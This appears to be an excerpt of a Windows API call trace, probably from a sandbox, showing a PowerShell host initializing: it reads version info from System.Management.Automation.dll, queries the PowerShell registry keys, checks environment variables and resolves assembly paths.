	[0249.176] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0249.176] CoTaskMemFree (pv=0x0) 
	[0249.177] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12dd88, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12dd80 | out: pulNumLanguages=0x12dd88, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12dd80) returned 1
	[0249.177] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12dd88, pwszLanguagesBuffer=0x2c7dee0, pcchLanguagesBuffer=0x12dd80 | out: pulNumLanguages=0x12dd88, pwszLanguagesBuffer=0x2c7dee0, pcchLanguagesBuffer=0x12dd80) returned 1
	[0249.182] CoTaskMemAlloc (cb=0x24) returned 0x258910
	[0249.182] GetUserDefaultLocaleName (in: lpLocaleName=0x258910, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0249.182] CoTaskMemFree (pv=0x258910) 
	[0249.719] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0249.719] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0249.719] CoTaskMemFree (pv=0x24c0b0) 
	[0249.721] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0249.721] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0249.721] CoTaskMemFree (pv=0x24c0b0) 
	[0249.723] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0249.723] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0249.723] CoTaskMemFree (pv=0x24c0b0) 
	[0249.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0249.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0249.732] SetErrorMode (uMode=0x1) returned 0x1
	[0249.732] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x12da00 | out: lpFileInformation=0x12da00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0249.732] SetErrorMode (uMode=0x1) returned 0x1
	[0249.732] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x12dc70 | out: lpdwHandle=0x12dc70) returned 0x94c
	[0249.733] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c81770 | out: lpData=0x2c81770) returned 1
	[0249.734] VerQueryValueW (in: pBlock=0x2c81770, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12dbe8, puLen=0x12dbe0 | out: lplpBuffer=0x12dbe8*=0x2c8180c, puLen=0x12dbe0) returned 1
	[0249.734] VerQueryValueW (in: pBlock=0x2c81770, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x12db58, puLen=0x12db50 | out: lplpBuffer=0x12db58*=0x2c818e8, puLen=0x12db50) returned 1
	[0249.734] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0249.734] CoTaskMemAlloc (cb=0x2e) returned 0x262520
	[0249.734] lstrcpyW (in: lpString1=0x262520, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0249.734] CoTaskMemFree (pv=0x262520) 
	[0249.734] VerQueryValueW (in: pBlock=0x2c81770, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x12db58, puLen=0x12db50 | out: lplpBuffer=0x12db58*=0x2c8193c, puLen=0x12db50) returned 1
	[0249.734] lstrlenW (lpString="System.Management.Automation") returned 28
	[0249.734] CoTaskMemAlloc (cb=0x3c) returned 0x2636c0
	[0249.734] lstrcpyW (in: lpString1=0x2636c0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0249.734] CoTaskMemFree (pv=0x2636c0) 
	[0249.734] VerQueryValueW (in: pBlock=0x2c81770, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x12db58, puLen=0x12db50 | out: lplpBuffer=0x12db58*=0x2c81998, puLen=0x12db50) returned 1
	[0249.734] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0249.734] CoTaskMemAlloc (cb=0x20) returned 0x25fc20
	[0249.734] lstrcpyW (in: lpString1=0x25fc20, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0249.734] CoTaskMemFree (pv=0x25fc20) 
	[0249.734] VerQueryValueW (in: pBlock=0x2c81770, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x12db58, puLen=0x12db50 | out: lplpBuffer=0x12db58*=0x2c819d8, puLen=0x12db50) returned 1
	[0249.734] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0249.734] CoTaskMemAlloc (cb=0x44) returned 0x2636c0
	[0249.734] lstrcpyW (in: lpString1=0x2636c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0249.735] CoTaskMemFree (pv=0x2636c0) 
	[0249.735] VerQueryValueW (in: pBlock=0x2c81770, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x12db58, puLen=0x12db50 | out: lplpBuffer=0x12db58*=0x2c81a40, puLen=0x12db50) returned 1
	[0249.735] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0249.735] CoTaskMemAlloc (cb=0x76) returned 0x203e30
	[0249.735] lstrcpyW (in: lpString1=0x203e30, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0249.735] CoTaskMemFree (pv=0x203e30) 
	[0249.735] VerQueryValueW (in: pBlock=0x2c81770, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x12db58, puLen=0x12db50 | out: lplpBuffer=0x12db58*=0x2c81adc, puLen=0x12db50) returned 1
	[0249.735] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0249.735] CoTaskMemAlloc (cb=0x44) returned 0x2636c0
	[0249.735] lstrcpyW (in: lpString1=0x2636c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0249.735] CoTaskMemFree (pv=0x2636c0) 
	[0249.735] VerQueryValueW (in: pBlock=0x2c81770, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x12db58, puLen=0x12db50 | out: lplpBuffer=0x12db58*=0x2c81b40, puLen=0x12db50) returned 1
	[0249.735] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0249.735] CoTaskMemAlloc (cb=0x58) returned 0x1b5920
	[0249.735] lstrcpyW (in: lpString1=0x1b5920, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0249.735] CoTaskMemFree (pv=0x1b5920) 
	[0249.735] VerQueryValueW (in: pBlock=0x2c81770, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x12db58, puLen=0x12db50 | out: lplpBuffer=0x12db58*=0x2c81bbc, puLen=0x12db50) returned 1
	[0249.735] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0249.735] CoTaskMemAlloc (cb=0x20) returned 0x25fc20
	[0249.735] lstrcpyW (in: lpString1=0x25fc20, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0249.735] CoTaskMemFree (pv=0x25fc20) 
	[0249.735] VerQueryValueW (in: pBlock=0x2c81770, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x12db58, puLen=0x12db50 | out: lplpBuffer=0x12db58*=0x2c81864, puLen=0x12db50) returned 1
	[0249.735] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0249.735] CoTaskMemAlloc (cb=0x66) returned 0x25ea30
	[0249.735] lstrcpyW (in: lpString1=0x25ea30, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0249.735] CoTaskMemFree (pv=0x25ea30) 
	[0249.735] VerQueryValueW (in: pBlock=0x2c81770, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x12db58, puLen=0x12db50 | out: lplpBuffer=0x12db58*=0x0, puLen=0x12db50) returned 0
	[0249.735] VerQueryValueW (in: pBlock=0x2c81770, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x12db58, puLen=0x12db50 | out: lplpBuffer=0x12db58*=0x0, puLen=0x12db50) returned 0
	[0249.735] VerQueryValueW (in: pBlock=0x2c81770, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x12db58, puLen=0x12db50 | out: lplpBuffer=0x12db58*=0x0, puLen=0x12db50) returned 0
	[0249.735] VerQueryValueW (in: pBlock=0x2c81770, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12db28, puLen=0x12db20 | out: lplpBuffer=0x12db28*=0x2c8180c, puLen=0x12db20) returned 1
	[0249.735] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0249.735] VerLanguageNameW (in: wLang=0x0, szLang=0x206630, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0249.736] CoTaskMemFree (pv=0x206630) 
	[0249.736] VerQueryValueW (in: pBlock=0x2c81770, lpSubBlock="\\", lplpBuffer=0x12db78, puLen=0x12db70 | out: lplpBuffer=0x12db78*=0x2c81798, puLen=0x12db70) returned 1
	[0249.744] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0249.744] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0249.744] CoTaskMemFree (pv=0x24c0b0) 
	[0249.745] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0249.745] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0249.745] CoTaskMemFree (pv=0x24c0b0) 
	[0249.749] lstrlenW (lpString="䅁") returned 1
	[0249.757] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12da48 | out: phkResult=0x12da48*=0x300) returned 0x0
	[0249.758] RegOpenKeyExW (in: hKey=0x300, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x12da38 | out: phkResult=0x12da38*=0x304) returned 0x0
	[0249.758] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12dac8 | out: phkResult=0x12dac8*=0x308) returned 0x0
	[0250.338] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12da0c, lpData=0x0, lpcbData=0x12da08*=0x0 | out: lpType=0x12da0c*=0x1, lpData=0x0, lpcbData=0x12da08*=0x56) returned 0x0
	[0250.339] CoTaskMemAlloc (cb=0x5a) returned 0x25e9c0
	[0250.339] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d9dc, lpData=0x25e9c0, lpcbData=0x12d9d8*=0x56 | out: lpType=0x12d9dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d9d8*=0x56) returned 0x0
	[0250.339] CoTaskMemFree (pv=0x25e9c0) 
	[0250.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0250.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0250.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0250.366] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0250.366] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0250.366] CoTaskMemFree (pv=0x24c0b0) 
	[0252.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0252.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0252.559] CoTaskMemAlloc (cb=0x104) returned 0x24c1c0
	[0252.559] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0252.559] CoTaskMemFree (pv=0x24c1c0) 
	[0252.560] CoTaskMemAlloc (cb=0x104) returned 0x24c1c0
	[0252.560] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0252.560] CoTaskMemFree (pv=0x24c1c0) 
	[0252.936] CoTaskMemAlloc (cb=0x104) returned 0x24c1c0
	[0252.936] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0252.936] CoTaskMemFree (pv=0x24c1c0) 
	[0252.936] CoTaskMemAlloc (cb=0x104) returned 0x24c1c0
	[0252.937] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0252.937] CoTaskMemFree (pv=0x24c1c0) 
	[0252.937] CoTaskMemAlloc (cb=0x104) returned 0x24c1c0
	[0252.937] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0252.937] CoTaskMemFree (pv=0x24c1c0) 
	[0253.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0253.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0253.681] CoTaskMemAlloc (cb=0x104) returned 0x24c1c0
	[0253.682] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0253.682] CoTaskMemFree (pv=0x24c1c0) 
	[0253.685] CoTaskMemAlloc (cb=0x104) returned 0x24c1c0
	[0253.685] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0253.685] CoTaskMemFree (pv=0x24c1c0) 
	[0254.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0254.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0257.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0257.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0258.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0258.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0261.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0261.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0261.333] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0261.333] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0261.333] CoTaskMemFree (pv=0x24c3e0) 
	[0261.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0261.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0261.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0261.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0261.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x12d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0261.722] SetErrorMode (uMode=0x1) returned 0x1
	[0261.723] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x12d9a0 | out: lpFileInformation=0x12d9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0261.723] SetErrorMode (uMode=0x1) returned 0x1
	[0262.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0262.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0262.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0262.036] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0262.036] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0262.036] CoTaskMemFree (pv=0x24c3e0) 
	[0262.647] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0262.647] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0262.647] CoTaskMemFree (pv=0x24c3e0) 
	[0262.647] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0262.647] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0262.648] CoTaskMemFree (pv=0x24c3e0) 
	[0262.650] CoCreateGuid (in: pguid=0x12dd68 | out: pguid=0x12dd68*(Data1=0xc2ded594, Data2=0x5ae3, Data3=0x4cf1, Data4=([0]=0x8f, [1]=0x78, [2]=0x4c, [3]=0x7e, [4]=0x6e, [5]=0xac, [6]=0x9c, [7]=0xb))) returned 0x0
	[0262.652] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
